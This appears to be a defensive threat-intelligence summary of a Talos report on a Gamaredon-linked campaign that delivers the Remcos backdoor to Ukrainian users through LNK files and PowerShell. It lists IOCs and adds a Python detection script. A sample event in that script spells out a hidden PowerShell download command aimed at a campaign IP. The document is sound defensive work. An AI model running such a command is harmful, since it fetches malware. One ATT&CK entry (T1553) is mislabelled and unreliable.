Cisco Talos is actively tracking an ongoing campaign, active since at least November 2024, that targets users in Ukraine with malicious LNK files which run a PowerShell downloader.
Analysis Summary
# Tool/Technique: Remcos Backdoor (Distributed via LNK files and PowerShell)
## Overview
This describes an active campaign targeting users in Ukraine, utilizing malicious LNK files to execute a PowerShell downloader, which subsequently fetches and executes the Remcos remote access backdoor. The campaign leverages themes related to the invasion of Ukraine for social engineering.
## Technical Details
- Type: Malware family (Remcos Backdoor), Technique (LNK Execution, DLL Side-loading)
- Platform: Windows (implied by LNK files, PowerShell, and Explorer.exe injection)
- Capabilities: Remote access, file execution, payload delivery, persistence via injection.
- First Seen: Campaign active since at least November 2024.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (likely method of delivery, via ZIP archive)
- **TA0002 - Execution**
  - T1204 - User Execution
    - T1204.002 - Malicious File
  - T1059 - Command and Scripting Interpreter
    - T1059.001 - PowerShell
- **TA0003 - Persistence**
  - T1553 - Subvert Control Plane/System Firmware (**Implied via injection into Explorer.exe**)
- **TA0005 - Defense Evasion**
  - T1036 - Masquerading
    - T1036.005 - Match Legitimate Name or Location (using decoy files)
  - T1027 - Obfuscated Files or Information (indirect execution via `Get-Command`)
- **TA0011 - Command and Control**
  - T1071 - Application Layer Protocol
    - T1071.001 - Web Protocols (HTTP used for payload download)
## Functionality
### Core Capabilities
- **Initial Delivery:** Malicious LNK files disguised as document files are distributed, often compressed in ZIP archives.
- **Execution Chain:** LNK file execution triggers a PowerShell downloader.
- **Payload Retrieval:** The PowerShell script contacts geo-fenced C2 servers (located in Russia and Germany) to download a second-stage ZIP file containing the Remcos binary.
- **Remcos Execution:** The Remcos payload is executed using DLL side-loading.
- **Process Injection:** The final Remcos binary injects itself into `explorer.exe`.
### Advanced Features
- **Indirect Cmdlet Invocation:** The PowerShell downloader resolves its download and execution functions through the `Get-Command` cmdlet rather than naming them directly, which can defeat string-based AV signatures.
- **Geo-fencing/Access Restriction:** The C2 servers serve the payload only to requests from certain geographies; victims in Ukraine are likely served, while testing from outside received HTTP 403 errors.
- **Decoy Files:** A decoy file is displayed to disguise the compromise after infection.
## Indicators of Compromise
- File Hashes: Not provided in the source report.
- File Names: LNK files with Russian or Ukrainian names related to military coordination or troop movement, using a document-style double extension (e.g., `...docx.lnk`, `...xlsx.lnk`) and referencing specific individuals or troop locations.
- Registry Keys: Not provided in the source report.
- Network Indicators:
- 146[.]185[.]233[.]96 (Used for C2 communication on port 6856)
- Other download servers: 146[.]185[.]233[.]96, 146[.]185[.]233[.]101, 146[.]185[.]239[.]45, 80[.]66[.]79[.]91, 80[.]66[.]79[.]195, 81[.]19[.]131[.]95, 80[.]66[.]79[.]159, 80[.]66[.]79[.]200, 80[.]66[.]79[.]155, 146[.]185[.]239[.]51, 146[.]185[.]233[.]90, 146[.]185[.]233[.]97.
- Behavioral Indicators: Execution chain starting from LNK file loading PowerShell, contacting known infrastructure, and injecting into `explorer.exe`.
## Associated Threat Actors
- Gamaredon (Assessed with medium confidence)
## Detection Methods
- Signature-based detection: Snort SIDs: 64707, 64708 (Snort 2), 301171 (Snort 3).
- Behavioral detection: Detecting unusual use of PowerShell triggered by LNK files, suspicious network connections to known C2 IPs, and injection into `explorer.exe`.
- YARA rules: Not provided in the source report.
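As an added illustration (not code from the Talos report), the Python rules below apply the behavioral indicators above to constructed Sysmon-style events: a PowerShell process spawned by `explorer.exe` whose command line invokes a download cmdlet through `Get-Command`, and network connections to the addresses and port listed under Network Indicators. The event dictionary shape and the sample command lines are assumptions.

```python
import re

# Download/C2 addresses listed in the report (defanged there; refanged here for matching).
KNOWN_INFRA = {ip.replace("[.]", ".") for ip in [
    "146[.]185[.]233[.]96", "146[.]185[.]233[.]101", "146[.]185[.]239[.]45",
    "80[.]66[.]79[.]91", "80[.]66[.]79[.]195", "81[.]19[.]131[.]95",
    "80[.]66[.]79[.]159", "80[.]66[.]79[.]200", "80[.]66[.]79[.]155",
    "146[.]185[.]239[.]51", "146[.]185[.]233[.]90", "146[.]185[.]233[.]97",
]}
C2_PORT = 6856  # port the report names for C2 communication

# Constructed sample events in a Sysmon-like shape (hypothetical, not from the report).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "& (Get-Command Invoke-WebRequest) http://146.185.233.96/a.zip"'},
    {"type": "network", "image": PS, "dest_ip": "146.185.233.96", "dest_port": 80},
    {"type": "network", "image": r"C:\Windows\explorer.exe", "dest_ip": "146.185.233.96", "dest_port": 6856},
    {"type": "process", "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},  # benign admin use
]

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event matches the campaign's behaviour (empty list if none)."""
    reasons = []
    if event["type"] == "process" and _basename(event["image"]) == "powershell.exe":
        if _basename(event["parent"]) == "explorer.exe":
            reasons.append("powershell.exe spawned by explorer.exe (LNK double-click pattern)")
        cmd = event["cmdline"]
        if re.search(r"get-command", cmd, re.I) and re.search(r"https?://|invoke-webrequest|webclient|\biwr\b", cmd, re.I):
            reasons.append("download cmdlet resolved indirectly via Get-Command")
    elif event["type"] == "network":
        if event["dest_ip"] in KNOWN_INFRA:
            reasons.append(f"connection to known campaign infrastructure {event['dest_ip']}")
        if event["dest_port"] == C2_PORT:
            reasons.append(f"traffic on reported C2 port {C2_PORT}")
        if reasons and _basename(event["image"]) == "explorer.exe":
            reasons.append("outbound connection from explorer.exe (consistent with injection)")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that matched at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, "; ".join(why))
```

The rules are intentionally strict about the parent process and the known addresses, so legitimate PowerShell use launched from a console (the last sample event) produces no alert.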
## Mitigation Strategies
- **Email Security:** Use Cisco Secure Email to block malicious email attachments.
- **Endpoint Protection:** Deploy Cisco Secure Endpoint to prevent malware execution.
- **Network Segmentation/Filtering:** Use Cisco Secure Firewall or Umbrella to block connections to known malicious IPs/domains associated with C2 infrastructure.
- **Network Analytics:** Utilize Cisco Secure Network/Cloud Analytics to profile and alert on process injection behavior.
- **Authentication:** Employ Cisco Duo for multi-factor authentication to limit access even if initial compromise occurs.
## Related Tools/Techniques
- Remcos Backdoor (The final payload)
- LNK file techniques used for initial execution.
- PowerShell for obfuscated downloading.